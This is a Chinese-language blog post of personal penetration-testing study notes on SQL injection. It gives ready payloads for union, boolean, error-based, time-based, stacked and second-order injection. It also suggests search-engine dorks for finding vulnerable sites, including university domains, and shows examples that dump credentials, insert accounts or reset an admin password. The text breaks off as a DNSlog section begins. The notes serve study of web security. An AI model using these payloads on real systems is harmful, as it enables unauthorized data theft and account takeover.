<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>sql注入 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="很久没碰渗透测试了，趁着复习的机会，顺便整理一下以前的笔记。 首先是SQL注入相关的内容。  一、SQL注入基础：1、注入类型： 数字型：select * from table where id&#x3D;$id;  ?id&#x3D;3 and 1&#x3D;2 –+   字符型：select * from table where name&#x3D;’$name’;  ?id&#x3D;3’">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="http://example.com/2023/09/14/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="很久没碰渗透测试了，趁着复习的机会，顺便整理一下以前的笔记。 首先是SQL注入相关的内容。  一、SQL注入基础：1、注入类型： 数字型：select * from table where id&#x3D;$id;  ?id&#x3D;3 and 1&#x3D;2 –+   字符型：select * from table where name&#x3D;’$name’;  ?id&#x3D;3’">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png">
<meta property="article:published_time" content="2023-09-14T09:59:02.000Z">
<meta property="article:modified_time" content="2023-10-17T10:01:16.212Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2023/09/14/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'sql注入',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-10-17 18:01:16'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = (url,id = false) => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      if (id) link.id = id
      link.onerror = reject
      link.onload = link.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        link.onload = link.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">14</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">4</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><hr class="custom-hr"/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a href="/" title="Hexo"><span class="site-name">Hexo</span></a></span><div id="menus"><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">sql注入</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2023-09-14T09:59:02.000Z" title="Created 2023-09-14 17:59:02">2023-09-14</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2023-10-17T10:01:16.212Z" title="Updated 2023-10-17 18:01:16">2023-10-17</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="sql注入"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><ul>
<li>很久没碰渗透测试了，趁着复习的机会，顺便整理一下以前的笔记。</li>
<li>首先是SQL注入相关的内容。</li>
</ul>
<h1 id="一、SQL注入基础："><a href="#一、SQL注入基础：" class="headerlink" title="一、SQL注入基础："></a>一、SQL注入基础：</h1><h2 id="1、注入类型："><a href="#1、注入类型：" class="headerlink" title="1、注入类型："></a>1、注入类型：</h2><ul>
<li><p>数字型：select * from table where id&#x3D;$id;</p>
<ul>
<li>?id&#x3D;3 and 1&#x3D;2 –+</li>
</ul>
</li>
<li><p>字符型：select * from table where name&#x3D;’$name’;</p>
<ul>
<li>?id&#x3D;3’ and 1&#x3D;2 –+</li>
</ul>
</li>
<li><p>搜索型：select * from user where username like ‘%$name%’ order by password</p>
<ul>
<li>?name&#x3D;3%’ and 1&#x3D;2 –+</li>
</ul>
</li>
</ul>
<h2 id="2、注入点位置："><a href="#2、注入点位置：" class="headerlink" title="2、注入点位置："></a>2、注入点位置：</h2><ul>
<li><p>GET:</p>
<ul>
<li>url中，?id&#x3D;</li>
</ul>
</li>
<li><p>POST:</p>
<ul>
<li>普通型：请求体中,key1&#x3D;val1&amp;key2&#x3D;val2</li>
<li>JSON型：JavaScript Object Notation<ul>
<li>会在请求头中标明：Content-Type:application&#x2F;json;charset&#x3D;utf-8</li>
<li>请求体中的JSON数据格式为：</li>
<li>json&#x3D;{“username”:”3034”,”passwd”:”123456”}</li>
</ul>
</li>
</ul>
</li>
<li><p>Cookie：</p>
<ul>
<li>格式：  cookie_name&#x3D;123456</li>
<li>PHP脚本中，使用 $_COOKIE数组，接收</li>
</ul>
</li>
<li><p>User-Agent：在http请求头中</p>
<ul>
<li>脚本可能以此获取客户端信息带入到了数据库进行查询</li>
<li>PHP脚本中，以 $_SERVER数组，接收</li>
</ul>
</li>
<li><p><strong>任何可能与数据库交互的地方</strong></p>
</li>
</ul>
<h2 id="3、查找注入目标："><a href="#3、查找注入目标：" class="headerlink" title="3、查找注入目标："></a>3、查找注入目标：</h2><ul>
<li>无特定目标网站：<ul>
<li>浏览器搜索语法：inurl:php?id&#x3D; </li>
<li>可以检索出url中特定内容的网站。</li>
</ul>
</li>
<li>有特定的目标网站：<ul>
<li>浏览器搜索：inurl:php?id&#x3D; site:edu.cn</li>
<li>inurl限制url内容，site限制站点</li>
</ul>
</li>
<li>使用工具爬取：<ul>
<li>编写脚本批量获取网页url，再使用正则匹配，得到可能有注点的网页</li>
<li>或直接使用已经编写的工具，如gau,sqlmap</li>
</ul>
</li>
</ul>
<h2 id="4、注入流程-Mysql-："><a href="#4、注入流程-Mysql-：" class="headerlink" title="4、注入流程(Mysql)："></a>4、注入流程(Mysql)：</h2><ul>
<li>判断列数：为了联合注入union select时不报错<ul>
<li>?id&#x3D;1’ order by 3#，没有报错</li>
<li>?id&#x3D;1’ order by 4#，报错</li>
<li>说明存在3列</li>
</ul>
</li>
<li>判断回显列：为了注入时能将数据显示出来<ul>
<li>?id&#x3D;-1’ union select 1,2,3#</li>
<li>页面返回，1，3，说明注点参数应设计在1,3列。</li>
</ul>
</li>
<li>爆出数据库：<ul>
<li>?id&#x3D;-1’ union select 1,database(),3#</li>
<li>显示当前数据库</li>
<li>?id&#x3D;-1’ union select 1,group_concat(schema_name),3 from information_schema.schemata</li>
<li>获取当前所有的数据库</li>
</ul>
</li>
<li>爆出某个数据库的所有表：假设数据库名mysql<ul>
<li>?id&#x3D;-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema&#x3D;”mysql”</li>
</ul>
</li>
<li>爆出某个表的所有列的名字：<ul>
<li>?id&#x3D;-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name&#x3D;”table”#</li>
<li>若有需要，where语句也可以加上数据库的判断</li>
</ul>
</li>
<li>爆数据：<ul>
<li>?id&#x3D;-1 union select username,passwd,3 from table#</li>
</ul>
</li>
<li>小技巧，使用limit：<ul>
<li>limit作用： 限制select条数, limit 5 相当于 limit 0,5 </li>
<li>从第0行开始取5条，第一行默认为0，故想取第5条：limit 4,1</li>
</ul>
</li>
</ul>
<h1 id="二、常见数据库："><a href="#二、常见数据库：" class="headerlink" title="二、常见数据库："></a>二、常见数据库：</h1><h2 id="1、分类："><a href="#1、分类：" class="headerlink" title="1、分类："></a>1、分类：</h2><ul>
<li>关系型：<ul>
<li>MySQL，Oracle，SQL Server，Access，PostgreSQL</li>
</ul>
</li>
<li>非关系型：<ul>
<li>Redis，mongodb</li>
</ul>
</li>
</ul>
<h2 id="2、MySQL："><a href="#2、MySQL：" class="headerlink" title="2、MySQL："></a>2、MySQL：</h2><ul>
<li><p>默认端口：3306</p>
</li>
<li><p>连接：</p>
<ul>
<li>正常连接，使用mysql客户端（kali已经提前装好）：<ul>
<li>mysql -h 8.130.9.147 -P 3306 -u root -p 123456</li>
<li>用户名root，密码123456，-p直接回车，可以隐藏输入的密码</li>
</ul>
</li>
</ul>
</li>
<li><p>数据库的结构：</p>
<ul>
<li>数据库-&gt;表</li>
</ul>
</li>
<li><p>使用SQL语句：</p>
<ul>
<li><p>SHOW DATABASE;</p>
</li>
<li><p>SELECT * FROM TABLE;</p>
</li>
</ul>
</li>
<li><p>常用函数：</p>
<ul>
<li><p>数据库版本：version()，当前数据库名字：database()</p>
</li>
<li><p>当前登入的用户：user()，system_user() ：系统用户名</p>
</li>
<li><p>@@datadir：数据库路径，@@basedir：数据库安装路径，@@version_compile_os：操作系统</p>
</li>
<li><p>concat()：没有分隔符的连接字符串，concat(username,password)<br>concat_ws()：含有分隔符的连接字符串，concat_ws(‘:’,username,password)</p>
<p>group_concat() ：连接一个组的某列的所有行，以逗号分隔，group_concat(username)</p>
</li>
<li><p>load_file()：读取本地文件，select load_file(‘D:\YY\test.txt’);<br>into outfile：写文件，select ‘MySQL’ into outfile ‘D:\YY\test2.txt’;</p>
</li>
</ul>
</li>
<li><p>高版本下，支持information_schema数据库：</p>
<ul>
<li>schemata表中：schema_name字段保存的是数据库名字</li>
<li>tables表中：table_schema字段保存的是该表属于的数据库，table_name为该表表名</li>
<li>columns表中：table_schema字段保存的是该表属于的数据库，table_name为该表表名，column_name为当前列的名字</li>
</ul>
</li>
</ul>
<h2 id="3、SQL-Server："><a href="#3、SQL-Server：" class="headerlink" title="3、SQL Server："></a>3、SQL Server：</h2><ul>
<li><p>默认端口：1433</p>
</li>
<li><p>支持两种身份验证：</p>
<ul>
<li>SQL Server用户身份验证</li>
<li>Windows用户身份验证：<ul>
<li>通过了服务端的计算机的用户认证，认为也有了计算机上的SQL Server权限</li>
</ul>
</li>
</ul>
</li>
<li><p>连接：</p>
<ul>
<li><p>使用官方可视化管理工具SSMS(<strong>SQL Server Management Studio</strong>)：</p>
<ul>
<li>选择服务器，验证类型，输入账号密码。（远程连接时，服务器名称输入服务端ip地址）</li>
</ul>
<p><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309181734768.png" alt="image-20230918173355636"></p>
<ul>
<li>登入成功后，可以可视化查询操作数据库，点击<strong>新建查询</strong>，使用sql脚本来查询管理。</li>
</ul>
</li>
<li><p>使用官方命令行查询工具mssql-cli：</p>
<ul>
<li>mssql-cli 是用于查询 SQL Server 的交互式命令行工具，可在 Windows、macOS 或 <strong>Linux</strong> 上进行运行。</li>
<li>官方文档：<a target="_blank" rel="noopener" href="https://github.com/dbcli/mssql-cli">https://github.com/dbcli/mssql-cli</a></li>
</ul>
</li>
<li><p>使用Impacket工具包下的mssqlclient.py脚本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python mssqlclient.py ./username:password@ip</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">默认SQLServer身份认证</span></span><br><span class="line">python mssqlclient.py domain/username:password@ip -windows-auth</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">指定使用windows身份认证</span></span><br></pre></td></tr></table></figure>

<ul>
<li>Impacket工具包：<a target="_blank" rel="noopener" href="https://github.com/fortra/impacket">https://github.com/fortra/impacket</a></li>
</ul>
</li>
</ul>
</li>
<li><p>SQL Sever常用特性：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1668918">https://cloud.tencent.com/developer/article/1668918</a></p>
</li>
</ul>
<h2 id="4、Redis数据库："><a href="#4、Redis数据库：" class="headerlink" title="4、Redis数据库："></a>4、Redis数据库：</h2><ul>
<li><p>默认端口：6379</p>
</li>
<li><p><strong>纯内存型</strong>非关系型<strong>kv型</strong>数据库。</p>
<ul>
<li>内存型意味着速度非常快。</li>
<li>mysql是基于磁盘的，再怎么快都会有瓶颈。</li>
<li>一般redis做缓存，查询优先rerdis，没有则走mysql。</li>
</ul>
</li>
<li><p>配置文件&#x2F;etc&#x2F;redis&#x2F;redis.conf：</p>
<ul>
<li>requirepass，设置密码，无用户等操作，需要直接在配置文件中设置密码</li>
<li>bind 127.0.0.1 ::1，指定监听的网卡IP，指定后，redis服务器只允许来自指定网卡的客户端请求，如果<strong>需要远程连接，需要配置为0.0.0.0，或者注释该选项</strong></li>
<li>protected-mode no，是否开启保护模式，开启后，即便注释了bind选项，仍然只接受本地的redis请求</li>
</ul>
</li>
<li><p>连接：</p>
<ul>
<li>使用官方客户端redis-cli：</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h [ip] -p [端口] -a [密码]</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">有密码连接</span></span><br><span class="line">redis-cli -h [ip]</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">未授权漏洞连接</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>常用命令：</p>
<ul>
<li>ping，检测是否连接成功，回复PONG说明成功。</li>
<li>AUTH password，启动redis-cli后再输入密码进行认证</li>
<li>select num，选择第num号数据库</li>
<li>info，查看服务器信息</li>
<li>keys [正则表达式]，可以查看数据库所有符合规则的key，慎用，redis是单线程，大量key时会阻塞redis</li>
<li>set keyname keyvalue，设置一个键值对</li>
<li>get keyname，获取该key的值</li>
<li>type keyname，获取该key的类型（字符串？整型？）</li>
<li>del keyname，删除</li>
<li>flushdb，清除当前数据库的数据，flushall，清除所有数据库数据</li>
</ul>
</li>
</ul>
<h1 id="三、注入类型"><a href="#三、注入类型" class="headerlink" title="三、注入类型"></a>三、注入类型</h1><h2 id="1、布尔注入："><a href="#1、布尔注入：" class="headerlink" title="1、布尔注入："></a>1、布尔注入：</h2><ul>
<li><p>定义：页面返回结果无有效信息，但存在两种情况，sql语句正确时页面正常，不正确时不正常，可以构造sql语句，根据返回结果，来判断sql语句何时成立。</p>
</li>
<li><p>mysql内置函数：</p>
<ul>
<li>length(str)：返回str字符串的长度。</li>
<li>substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始</li>
<li>ascii(str)：返回字符串str的最左面字符的ASCII代码值。</li>
<li>ord(str):同上，返回ascii码</li>
<li>if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</li>
</ul>
</li>
<li><p>常用语句：</p>
<ul>
<li>具体字符判断：<strong>ascii、substr函数</strong><ul>
<li>?id&#x3D;1’ and ascii(substr((select database()),1,1))&gt;104 #</li>
<li>?id&#x3D;1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1,1))&#x3D;104–+</li>
<li>判断数据名字第一个字符是否与h的关系</li>
</ul>
</li>
<li>字符串判断：<strong>left函数</strong><ul>
<li>?id&#x3D;1’ and left(database(),1)&#x3D;’s’ –+</li>
<li>?id&#x3D;1’ and left(database(),2) &gt; ‘sa’ –+</li>
<li>取前1个比较，再去前2个比较</li>
</ul>
</li>
<li>Like语句判断：<ul>
<li>?id&#x3D;1’ and (select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1)like ‘e%’–+</li>
</ul>
</li>
</ul>
</li>
<li><p>在这些语句的基础上，使用自动化脚本或工具进行爆破。</p>
</li>
</ul>
<h2 id="2、报错注入："><a href="#2、报错注入：" class="headerlink" title="2、报错注入："></a>2、报错注入：</h2><ul>
<li><p>定义：通过页面爆出的错误信息，构造合适的语句来获取我们想要的数据，<strong>报错信息（含有具体数据）是由函数给出的。</strong></p>
</li>
<li><p>原因：</p>
<ul>
<li>系统未关闭数据库报错函数，对于一些SQL语句的错误，直接回显在了页面上</li>
<li>后台未对MySQL相应的报错函数进行过滤</li>
<li>mysql&gt;5.1.5</li>
</ul>
</li>
<li><p>xml文档：</p>
<ul>
<li>格式与HTML文档类似，但是HTML是用来展示数据，XML侧重于结构化地保存和传输数据。</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">bookstore</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">book</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span>Harry Potter<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">author</span>&gt;</span>J K. Rowling<span class="tag">&lt;/<span class="name">author</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">year</span>&gt;</span>2005<span class="tag">&lt;/<span class="name">year</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">price</span>&gt;</span>29.99<span class="tag">&lt;/<span class="name">price</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">book</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">bookstore</span>&gt;</span> </span><br></pre></td></tr></table></figure>

<ul>
<li>xpath语法：  <ul>
<li>用于在xml文档中查找信息的语言</li>
</ul>
</li>
</ul>
</li>
<li><p>concat()函数</p>
<ul>
<li>concat(0x7e,”字符串”,0x7e)</li>
<li>0x7e对应ascII码 ‘~’ ，0x5c对应ascII码 ‘\&#39;</li>
<li>将参数连接成字符串，”<del>字符串</del>“</li>
</ul>
</li>
<li><p><strong>extractvalue()语法报错</strong></p>
<ul>
<li><p>extractvalue(xml_document,Xpath_string)</p>
<ul>
<li>xml_document是string格式，为xml文档对象的名称</li>
<li>Xpath_string是xpath格式的字符串</li>
</ul>
</li>
<li><p>正常情况下，是查询XML文档的函数。</p>
</li>
<li><p>第二个参数是要求符合xpath语法的字符串，如果不符合xpath语法，则会报错，将查询结果放在报错信息里，可以利用。</p>
</li>
<li><p>爆版本号</p>
<ul>
<li>?id&#x3D;1’ and extractvalue(“anything”, concat(0x7e,(select @@version)))–+</li>
</ul>
</li>
<li><p>爆数据库</p>
<ul>
<li>?id&#x3D;1’ and extractvalue(“anything”, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1)))–+</li>
</ul>
</li>
</ul>
</li>
<li><p><strong>updatexml()语法报错</strong></p>
<ul>
<li><p>updatexml(xml_document,xpath_string,new_value)</p>
<ul>
<li>xml_document是string格式，为xml文档对象的名称</li>
<li>xpath_string是xpath格式的字符串</li>
<li>new_value是string格式，替换查找到的负荷条件的数据</li>
</ul>
</li>
<li><p>正常情况作用：替换查找成功时的XML文档节点内容</p>
</li>
<li><p>爆数据库：</p>
<ul>
<li>?id&#x3D;1’ and updatexml(1, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1)–+</li>
</ul>
</li>
<li><p>爆数据表：</p>
<ul>
<li>?id&#x3D;1’ and updatexml(1, concat(0x7e,(select table_name from  information_schema.tables where table_schema&#x3D;database() limit  3,1),0x7e),1)–+</li>
</ul>
</li>
</ul>
</li>
<li><p><strong>floor()主键冲突报错</strong></p>
<ul>
<li><p>select count(*) from table group by floor(rand(0)*2)</p>
</li>
<li><p>rand()产生0到1的随机数，rand(0)后，产生的随机数是可以预见的，即伪随机数</p>
<ul>
<li><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221830449.png" alt="image-20230311142730446"></li>
<li>此时rand(0)*2的前几个数，便可确认为，0.3,1.2,1.2,0.6,1.4，1.4，0.6,1.8</li>
</ul>
</li>
<li><p>floor()函数，返回小于等于所给数的最小整数</p>
<ul>
<li>此时floor(rand(0)*2) 产生的序列可以确认为 01101101……</li>
</ul>
</li>
<li><p>原理：SELECT COUNT(*),floor(RAND(0)*2) as x from users GROUP BY x</p>
<ul>
<li><p>查询记录时执行一次floor，分组时又执行一次floor</p>
</li>
<li><p>第一次floor得到0，虚拟表不存在，需要插入，插入时要进行group，又一次floor得到1，故实际插入表中的是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">count(*)    key</span><br><span class="line"> 1			1</span><br></pre></td></tr></table></figure>
</li>
<li><p>第二次得到 1，表中存在，不进行分组floor，count直接甲乙</p>
</li>
<li><p>第三次 首先floor得到0，表中不存在，要插入，执行分组floor得到1，即触发插入相同主键的元组，进而报错。</p>
</li>
</ul>
</li>
<li><p>常用语句</p>
<ul>
<li>?id&#x3D;1’ union select 1,count(),concat(0x7e,( <strong>select schema_name from  information_schema.schemata limit 5,1)</strong>,0x7e,<strong>floor(rand(0)2)</strong> )a from  information_schema.columns group by a–+</li>
<li>a&#x3D;(<del>数据库名字</del>特定随机数)，0x7e是分隔符</li>
</ul>
<p><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221830446.png" alt="image-20230311145901493"></p>
<ul>
<li>报错 dupicate entry ‘a’ for key ‘group_key’</li>
</ul>
</li>
</ul>
</li>
<li><p><strong>exp()移除报错</strong></p>
<ul>
<li>exp(x) 返回自然对数的底数e&#x3D;2.71……的x次方</li>
<li>当x逐渐增大时，数值会超过mysql的double类型能存储的极限，极限数值为x&#x3D;709，大于会报错：</li>
</ul>
<p><img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221830433.png" alt="image-20230311150943098"></p>
<ul>
<li>漏洞利用<ul>
<li>~按位取反运算符，可以处理字符串，得到一个很大的数值，足以超过double范围<img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221830444.png" alt="image-20230311151313418"></li>
<li>在 MySQL&gt;5.5.53 之后，exp() 报错不能返回我们的查询结果，而只会得到一个报错，在脚本语言中，就会将这些错误中的一些表达式转化成相应的值，从而爆出数据：<img src="https://rkang-blog-pictures.oss-cn-fuzhou.aliyuncs.com/blog_pictures/202309221830457.png" alt="image-20230311151706399"></li>
<li>?id&#x3D;1’ union select exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database())x)) –+</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="3、延时注入"><a href="#3、延时注入" class="headerlink" title="3、延时注入"></a>3、延时注入</h2><ul>
<li>定义：通过构造延时注入语句后，浏览器页面的响应时间来判断正确的数据</li>
<li>场景：<ul>
<li>无法使用union来直接查询并且正确页面和错误页面一致，我们无法区分。</li>
<li>使用函数：<ul>
<li>length() : 返回字符串长度</li>
<li>if(a,b,c) : a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</li>
<li>sleep(n): 强制让语句停留n秒钟</li>
</ul>
</li>
</ul>
</li>
<li>常用语句：<ul>
<li>判断数据库名字长度：<ul>
<li>id&#x3D;1’ and if((length(database())&#x3D;4),sleep(5),1) –+</li>
<li>数据库长度等于4，页面相应时间略大于5秒</li>
</ul>
</li>
<li>猜数据库名字：<ul>
<li>id&#x3D;1’ and if((ascii(substr(database(),1,1))&#x3D;116),sleep(5),1) –+</li>
<li>数据库名字第一个等于116，页面相应时间略大于5秒</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="4、堆叠注入"><a href="#4、堆叠注入" class="headerlink" title="4、堆叠注入"></a>4、堆叠注入</h2><ul>
<li>定义：stacked injection，一堆sql 语句(多条)一起执行</li>
<li>当需要获取管理员账号密码时，如果密码加密了，则难以解密</li>
<li>使用堆叠注入，直接自定义密码</li>
<li>?id&#x3D;1’; insert into users(id,username,password) values(88,’aaa’,’bbb’)#</li>
<li>?id&#x3D;1’ order by 3#</li>
<li>?id&#x3D;1’;show tables#</li>
<li>?id&#x3D;-1’;show columns from 1919810931114514%#</li>
</ul>
<h2 id="5、二次注入"><a href="#5、二次注入" class="headerlink" title="5、二次注入"></a>5、二次注入</h2><ul>
<li>定义：已存储的用户输入（数据库、文件）被读取后再次进入到 SQL 查询语句中导致的注入</li>
<li>一般只有在知道一些网站源码时再实施二次注入，属于白盒测试。</li>
<li>简单注入场景：<ul>
<li>已知数据库保存有用户admin 密码 abcdef</li>
<li>注册用户： 用户名：admin’# ，密码：123456<ul>
<li>虽然此时脚本得到的数据可能进行了转义，变为 admin\‘#而无法注入，但保存在数据库的仍是admin’#</li>
</ul>
</li>
<li>登入用户 admin’#后，进行密码修改<ul>
<li>修改语句：update users set passwd&#x3D;$new_passwd where user_name&#x3D;’admin’<strong>#</strong>‘ and passwd&#x3D;old_passwd;</li>
<li>此时实际修改的用户为admin，不用知道admin密码，却能够修改密码。</li>
</ul>
</li>
<li>结合报错注入内容，可以爆出更多数据。</li>
</ul>
</li>
<li>数据一般有长度限制，前端限制可以直接修改html代码</li>
</ul>
<h2 id="6、Dnslog对外注入"><a href="#6、Dnslog对外注入" class="headerlink" title="6、Dnslog对外注入"></a>6、Dnslog对外注入</h2><ul>
<li><p>DNSlog：存储在DNS服务器上的域名信息，它记录着用户对域名的访问信息，类似日志文件。</p>
</li>
